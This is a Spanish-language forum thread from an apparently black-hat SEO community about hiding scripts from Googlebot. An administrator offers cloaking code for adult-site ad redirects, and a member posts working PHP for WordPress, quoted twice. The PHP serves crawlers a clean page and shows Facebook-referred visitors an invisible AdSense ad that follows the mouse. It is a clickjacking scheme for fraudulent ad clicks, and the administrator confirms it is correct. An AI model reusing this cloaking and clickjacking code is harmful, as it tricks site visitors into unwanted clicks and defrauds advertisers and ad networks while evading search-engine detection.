• 10 voto(s) - 4.3 Media
  • 5
  • 4
  • 3
  • 2
  • 1
Modos de tema

Ocultar contenido a Bots de google.
Exkanon Offline
Desarrollador Web
*******
Administrators

Mensajes: 743
Temas: 55
Registro en: Dec 2015
Reputación: 56
Gracias: 3
346 Gracias recividas en 25 post(s)
Buenas, este código les ayudará si quieren esconder algo de google, por ejemplo redirecciones o cierto script BlackHat
lo suelo usar para poner la redirecciones de juicyads en mis webs XXX , y hacer redirecciones sin que google me joda las posiciones.
Necesitas estar registrado para ver estoSolo los usuarios registrados pueden ver el contenido. - Porfavor y da "Gracias" al post para ver su contenido.
Saludos.
Porque aún falta mucho por recorrer. 

treyfas Offline

BlackHaters

Mensajes: 225
Temas: 89
Registro en: Jan 2016
Reputación: 19
Gracias: 5
180 Gracias recividas en 48 post(s)
que hace el scrip en si, desvirtua a google

feltoxXx Offline

BlackHaters

Mensajes: 519
Temas: 8
Registro en: Jan 2016
Reputación: 2
Gracias: 0
0 Gracias recividas en 0 post(s)
(01-19-2016, 05:45 PM)treyfas escribió: que hace el scrip en si, desvirtua a google

Cuando ve que el que entra es San G pues no muestra el codigo y todo el script... eso para que a ojos de Big G nunca vea que hacemos algo malo..

Raichu Offline

BlackHaters

Mensajes: 8
Temas: 1
Registro en: Dec 2015
Reputación: 0
Gracias: 0
0 Gracias recividas en 0 post(s)
@Exkanon muchas gracias por el código. ¿Hay alguna forma de hacerlo en JavaScript para implementarlo en una plantilla de Blogger?

¡Saludos y gracias!

Exkanon Offline
Desarrollador Web
*******
Administrators

Mensajes: 743
Temas: 55
Registro en: Dec 2015
Reputación: 56
Gracias: 3
346 Gracias recividas en 25 post(s)
(01-19-2016, 08:35 PM)Raichu escribió: @Exkanon muchas gracias por el código. ¿Hay alguna forma de hacerlo en JavaScript para implementarlo en una plantilla de Blogger?

¡Saludos y gracias!

JavaScript se ejecuta en el navegador , osea el codigo de igual manera seria visible para los bots.
Porque aún falta mucho por recorrer. 

kkaiser Offline

BlackHaters

Mensajes: 32
Temas: 4
Registro en: Jan 2016
Reputación: 0
Gracias: 0
0 Gracias recividas en 0 post(s)
Este es un aporte muy valioso! muchas gracias

JOSEPEDRO00 Offline

BlackHaters

Mensajes: 4
Temas: 0
Registro en: Feb 2016
Reputación: 0
Gracias: 0
0 Gracias recividas en 0 post(s)
Queridos master saludos para todos.
Una pregunta.

esta bien este uso que le estoy dando a este codigo + el oculto??

Asi lo tengo dentro de wordpress en el plugin PHP y no me funciona. Ejemplo:


function is_bot(){
$bots = array('Googlebot', 'googlebot');

foreach($bots as $b){
if( stripos( $_SERVER['HTTP_USER_AGENT'], $b ) !== false ) return true;
}
return false;
}

if(is_bot()){

}else

{


$referer = $_SERVER['HTTP_REFERER'];
$referer=str_replace("http://", "", $referer);
$referer=str_replace("https://", "", $referer);
$referer=str_replace("www.", "", $referer);
$pieces2 = explode("/", $referer);
$referer=$pieces2[0];

if($referer == 'facebook.com') { $ref="si"; } else { $refer="no"; }

if(($ref=="si")) {


$ctr =100;
if (rand (0,100) <= $ctr)
{
$control="si";
}
else {
$control="no";
}
}
if(($ref=="si") && ($control=="si") ) {
echo "<style type=\"text/css\">
#clickjack
{
background-color: rgb(0,0,255); opacity: 0;
height: auto;
width: auto;
position: absolute;
top: 50;
left: 50;
border-bottom: 1px #76e042 solid;
border-bottom: 0px blue solid;
color: #ffffff;
padding: 0px;
z-index: 1001;
font-size: 13px;
}
</style>";
echo "<div id=\"clickjack\">";
echo "<a href=\"#\" onclick=\"getValue()\">\n";
echo "</a>\n";
echo "<div class='cfmonitor'>\n";
echo "<script async src=\"//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js\"></script>\n";
echo "<!-- nombre -->\n";
echo "<ins class=\"adsbygoogle\"\n";
echo "style=\"display:inline-block;width:336px;height:280px\"\n";
echo "data-ad-client=\"ca-pub-xxxxxxxxxxxxx\"\n";
echo "data-ad-slot=\"xxxxxxxxx\"></ins>\n";
echo "<script>\n";
echo "(adsbygoogle = window.adsbygoogle || []).push({});\n";
echo "</script>\n";
echo "</div>";
echo "<script type=\"text/javascript\">\n";
echo "var div = document.getElementById('clickjack');\n";
echo "document.addEventListener('mousemove',function(e) { \n";
echo "div.style.left = e.pageX -280 +\"px\";\n";
echo "div.style.top = e.pageY -360 +\"px\";\n";
echo "});\n";
echo "</script>\n";
echo "</div>";
}

}

Les agradezco de su gran ayuda Gracias totales.

benjy Offline

BlackHaters

Mensajes: 23
Temas: 0
Registro en: Feb 2016
Reputación: 0
Gracias: 2
0 Gracias recividas en 0 post(s)
(02-10-2016, 10:48 PM)JOSEPEDRO00 escribió: Queridos master saludos para todos.
Una pregunta.

esta bien este uso que le estoy dando a este codigo + el oculto??

Asi lo tengo dentro de wordpress en el plugin PHP y no me funciona. Ejemplo:


function is_bot(){
   $bots = array('Googlebot', 'googlebot');

  foreach($bots as $b){
      if( stripos( $_SERVER['HTTP_USER_AGENT'], $b ) !== false ) return true;
   }
  return false;
}

if(is_bot()){

}else

{


$referer = $_SERVER['HTTP_REFERER'];
$referer=str_replace("http://", "", $referer);
$referer=str_replace("https://", "", $referer);
$referer=str_replace("www.", "", $referer);
$pieces2 = explode("/", $referer);
$referer=$pieces2[0];

if($referer == 'facebook.com') { $ref="si"; } else  { $refer="no"; }

if(($ref=="si")) {


$ctr =100;
if (rand (0,100) <= $ctr)
{
$control="si";
}
else {
$control="no";
}
      }
if(($ref=="si") && ($control=="si") ) {
echo "<style type=\"text/css\">
#clickjack
{
background-color: rgb(0,0,255); opacity: 0;
height: auto;
width: auto;
position: absolute;
top: 50;
left: 50;
border-bottom: 1px #76e042 solid;
border-bottom: 0px blue solid;
color: #ffffff;
padding: 0px;
z-index: 1001;
font-size: 13px;
}
</style>";
echo "<div id=\"clickjack\">";
echo "<a href=\"#\" onclick=\"getValue()\">\n";
echo "</a>\n";
echo "<div class='cfmonitor'>\n";
echo "<script async src=\"//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js\"></script>\n";
echo "<!-- nombre   -->\n";
echo "<ins class=\"adsbygoogle\"\n";
echo "style=\"display:inline-block;width:336px;height:280px\"\n";
echo "data-ad-client=\"ca-pub-xxxxxxxxxxxxx\"\n";
echo "data-ad-slot=\"xxxxxxxxx\"></ins>\n";
echo "<script>\n";
echo "(adsbygoogle = window.adsbygoogle || []).push({});\n";
echo "</script>\n";
echo "</div>";
echo "<script type=\"text/javascript\">\n";
echo "var div = document.getElementById('clickjack');\n";
echo "document.addEventListener('mousemove',function(e) { \n";
echo "div.style.left = e.pageX -280 +\"px\";\n";
echo "div.style.top = e.pageY -360 +\"px\";\n";
echo "});\n";
echo "</script>\n";
echo "</div>";
}

}

Les agradezco de su gran ayuda Gracias totales.

tambien tengo esa duda, alguien podria aclarnos, yo lo puse asi pero no me funciona, algo esta  masl?

Exkanon Offline
Desarrollador Web
*******
Administrators

Mensajes: 743
Temas: 55
Registro en: Dec 2015
Reputación: 56
Gracias: 3
346 Gracias recividas en 25 post(s)
El codigo esta bien Big Grin
Porque aún falta mucho por recorrer. 

feltoxXx Offline

BlackHaters

Mensajes: 519
Temas: 8
Registro en: Jan 2016
Reputación: 2
Gracias: 0
0 Gracias recividas en 0 post(s)
Asi es que debe ir... todo parece bien... si publicas un link en facebook y entras desde ese link veras la publicidad... de otra manera nunca la veras... ya que es tu unico referer permitido

JOSEPEDRO00 Offline

BlackHaters

Mensajes: 4
Temas: 0
Registro en: Feb 2016
Reputación: 0
Gracias: 0
0 Gracias recividas en 0 post(s)
Master ya lo hice desde facebook como me dijeron y nada! :/


Posibles temas similares...
Tema / Autor Respuestas / Vistas Último mensaje
191 Replies 24,841 Views
Último mensaje by bemori
01-24-2017, 07:14 PM
28 Replies 4,051 Views
Último mensaje by u5880369
10-24-2016, 06:57 AM
4 Replies 976 Views
Último mensaje by antonioooa
10-05-2016, 12:53 PM
0 Replies 394 Views
Último mensaje by Koyomi
07-23-2016, 11:55 AM




Usuarios navegando en este tema: 2 invitado(s)